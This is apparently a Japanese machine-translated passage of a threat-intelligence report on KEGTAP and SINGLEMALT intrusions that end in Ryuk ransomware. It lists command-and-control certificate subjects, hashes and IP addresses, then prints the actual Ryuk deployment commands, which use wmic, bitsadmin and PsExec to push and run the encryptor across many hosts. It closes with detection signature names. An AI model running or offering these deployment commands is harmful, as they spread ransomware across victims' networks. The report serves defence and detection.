C=US、ST=TX、L=テキサス、O=lol、OU=、CN=サービスリーダー[.]com

e912980fc8e9ec1e570e209ebb163f65

10/14/20

45.147.230.141:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-checker[.]com

39d7160ce331a157d3ecb2a9f8a66f12

10/14/20

45.147.230.140:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-simple-helper[.]com

d9ca73fe10d52eef6952325d102f0138

10/14/20

45.147.230.133:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-leader[.]com

920d04330a165882c8076c07b00e1d93

10/14/20

45.147.230.132:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=boost-servicess[.]com

771463611a43ee35a0ce0631ef244dee

10/14/20

45.147.229.180:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=elephantdrrive[.]com

1e4a794da7d3c6d0677f7169fbe3b526

10/14/20

45.147.230.159:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=サービスリーダー[.]com

9c7fe10135f6ad96ded28fac51b79dfd

10/15/20

45.147.230.132:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=boost-servicess[.]com

a78c0e2920e421667ae734d923dd5ca6

10/15/20

45.138.172.95:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-hellper[.]com

a0b2378ceae498f46401aadeb278fb31

10/16/20

108.62.12.119:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=top-backuphelper[.]com

e95bb7804e3add830496bd36664ed339

10/16/20

108.62.12.105:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=best-nas[.]com

8d5dc95b3bd4d16a3434b991a09bf77e

10/16/20

108.62.12.114:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=top-backupservice[.]com

d5de2f5d2ca29da1724735cdb8fbc63f

10/16/20

108.62.12.116:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=bestservicehelper[.]com

9c7396ecd107ee8f8bf5521afabb0084

10/16/20

45.147.230.141:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-checker[.]com

1134a6f276f4297a083fc2a605e24f70

10/16/20

45.147.230.140:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-simple-helper[.]com

2150045f476508f89d9a322561b28ff9

10/16/20

45.147.230.133:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-leader[.]com

f4ddc4562e5001ac8fdf0b7de079b344

10/19/20

74.118.138.137:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=top3-services[.]com

75fb6789ec03961c869b52336fa4e085

10/19/20

74.118.138.115:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=simple-backupbooster[.]com

9f5e845091015b533b59fe5e8536a435

10/19/20

108.177.235.53:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=best-backup[.]com

4b78eaa4f2748df27ebf6655ea8a7fe9

10/19/20

74.118.138.138:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topbackup-helper[.]com

bcccda483753c82e62482c55bc743c16

2020/10/21

45.153.241.1:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backup1helper[.]com

672c66dd4bb62047bb836bd89d2e1a65

2020/10/21

45.153.240.240:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=checktodrivers[.]com

6825409698a326cc319ca40cd85a602e

2020/10/21

45.153.240.194:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=driver1master[.]com

7f9be0302da88e0d322e5701d52d4128

2020/10/21

45.153.240.138:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=boost-yourservice[.]com

2c6a0856d1a75b303337ac0807429e88

2020/10/21

45.153.240.136:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=backup1master[.]com

6559dbf8c47383b7b493500d7ed76f6a

2020/10/23

45.153.240.157:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=driver1updater[.]com

7bd044e0a6689ef29ce23e3ccb0736a3

2020/10/23

45.153.240.178:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=service1updater[.]com

9859a8336d097bc30e6e5c7a8279f18e

2020/10/23

45.153.240.220:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=driverdwl[.]com

43fb2c153b59bf46cf6f67e0ddd6ef51

2020/10/23

45.153.240.222:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=viewdrivers[.]com

22bafb30cc3adaa84fef747d589ab235

2020/10/23

45.153.241.134:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=backups1helper[.]com

31e87ba0c90bb38b986af297e4905e00

2020/10/23

45.153.241.138:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=driver1downloads[.]com

f8a14846b7da416b14303bced5a6418f

2020/10/23

45.153.241.146:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=servicehel[.]com

01abdaf870d859f9c1fd76f0b0328a2b

2020/10/23

45.153.241.153:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=service-hel[.]com

c2eaf144e21f3aef5fe4b1502d318ba6

2020/10/23

45.153.241.158:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=servicereader[.]com

de54af391602f3deea19cd5e1e912316

2020/10/23

45.153.241.167:443

C=US,ST=TX,L=テキサス州,O=US,OU=,CN=view-backup[.]com

5f6fa19ffe5735ff81b0e7981a864dc8

2020/10/23

45.147.231.222:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=top3servicebooster[.]com

ff54a7e6f51a850ef1d744d06d8e6caa

2020/10/23

45.153.241.141:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=service1view[.]com

4cda9d0bece4f6156a80967298455bd5

2020/10/26

74.118.138.139:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topbackupintheworld[.]com

e317485d700bf5e8cb8eea1ec6a72a1a

2020/10/26

108.62.12.12:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topservice-masters[.]com

e0022cbf0dd5aa597fee73e79d2b5023

2020/10/26

108.62.12.121:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topservicebooster[.]com

44e7347a522b22cdf5de658a4237ce58

2020/10/26

172.241.27.65:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backup1services[.]com

cd3e51ee538610879d6fa77fa281bc6f

2020/10/26

172.241.27.68:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backupmaster-service[.]com

04b6aec529b3656040a68e17afdabfa4

2020/10/26

172.241.27.70:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=backupmasterservice[.]com

200c25c2b93203392e1acf5d975d6544

2020/10/26

45.153.241.139:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=driver-boosters[.]com

9d7c52c79f3825baf97d1318bae3ebe2

2020/10/27

45.153.241.14:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=service1update[.]com

5bae28b0d0e969af2c0eda21abe91f35

2020/10/28

190.211.254.154:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=driverjumper[.]com

a1e62e7e547532831d0dd07832f61f54

2020/10/28

81.17.28.70:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=service1boost[.]com

67c7c75d396988ba7d6cd36f35def3e4

2020/10/28

81.17.28.105:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=idrivehepler[.]com

880e59b44e7175e62d75128accedb221

2020/10/28

179.43.160.205:443

C=US,ST=TX,L=テキサス,O=lol,OU=,CN=idrivedownload[.]com

cdea09a43bef7f1679e9cd1bbeb4b657

2020/10/28

179.43.158.171:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=idrivefinder[.]com

512c6e39bf03a4240f5a2d32ee710ce5

2020/10/28

179.43.133.44:443

C=US、ST=TX、L=テキサス、O=lol、OU=、CN=idrivedwn[.]com

87f3698c743f8a1296babf9fbebafa9f

2020/10/28

179.43.128.5:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=idrivecheck[.]com

6df66077378c5943453b36bd3a1ed105

2020/10/28

179.43.128.3:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=idriveupdate[.]com

9706fd787a32a7e94915f91124de3ad3

2020/10/28

81.17.28.122:443

C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=idriveview[.]com

0e1b0266de2b5eaf427f5915086b4d7c

リュークコマンド

start wmic /node:@C:share$comps1.txt /user:[編集済] /password:[編集済] プロセス コール create “cmd.exe /c bitsadmin /transfer vVv [編集済]share$vVv .exe %APPDATA%vVv.exe & %APPDATA%vVv.exe”

start PsExec.exe /accepteula @C:share$comps1.txt -u [編集済み] -p [編集済み] cmd /c COPY “[編集済み]share$vVv.exe” “C:windows tempvVv.exe”

start PsExec.exe -d @C:share$comps1.txt -u [編集済み] -p [編集済み] cmd /cc:windowstempvVv.exe

テクニックの検出

FireEye は、プラットフォーム全体でこのアクティビティを検出します。次の表には、このアクティビティが発生する前に利用可能だった検出のより大きなリストからの特定の検出名がいくつか含まれています。

プラットホーム

署名名

エンドポイント セキュリティ

  • KEGTAP インタラクティブ CMD.EXE 子プロセス (バックドア)
  • RUNDLL32.EXE (バックドア) による KEGTAP DLL の実行
  • SINGLEMALT (ダウンローダー)
  • STILLBOT(バックドア)
  • ワインキー (ダウンローダー)
  • コルボット (バックドア)
  • RYUK ランサムウェア暗号化コマンド (ファミリー)
  • RYUK ランサムウェアのセットアップ実行 (ファミリー)
  • RYUK ランサムウェア WAKE-ON-LAN 実行 (ファミリー)
  • RYUK ランサムウェアの段階的暗号化プログラムの内部転送ターゲット (ユーティリティ)
  • RYUK ランサムウェア暗号化ツールの配布スクリプトの作成 (ユーティリティ)
  • RYUK ランサムウェアの段階的暗号化ツールの内部転送ソース (ユーティリティ)

ネットワーク セキュリティと電子メール セキュリティ

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT

参照: https://www.mandiant.com/resources/blog/kegtap-and-singlemalt-with-a-ransomware-chaser

Comments

タイトルとURLをコピーしました